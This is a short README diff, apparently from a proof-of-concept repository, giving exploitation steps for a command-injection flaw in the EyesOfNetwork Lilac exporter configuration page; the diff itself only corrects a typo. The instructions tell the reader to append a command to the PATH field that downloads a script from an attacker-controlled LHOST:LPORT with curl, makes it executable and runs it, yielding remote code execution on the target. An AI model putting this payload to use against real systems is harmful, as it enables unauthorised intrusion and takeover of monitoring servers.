ArianeBlow/LilacPathVUln/README.md

 Go on EyesOfNetwork Lilac exporter config page : https://RHOST/lilac/export.php.

-Create a new config and modify the "PATH" (at the end of the webpage) and put the commande afetr the original line like that for exemple :
+Create a new config and modify the "PATH" (at the end of the webpage) and put the commande after the original line like that for exemple :
 ```
 /srv/eyesofnetwork/nagios/bin/nagios -v /tmp/lilac-export-33/nagios.cfg && curl http://LHOST:LPORT/test.sh -o /tmp/lilac-export-2/test.sh && chmod +x /tmp/lilac-export-2/test.sh && cd /tmp/lilac-export-2/ && ./test.sh
 ```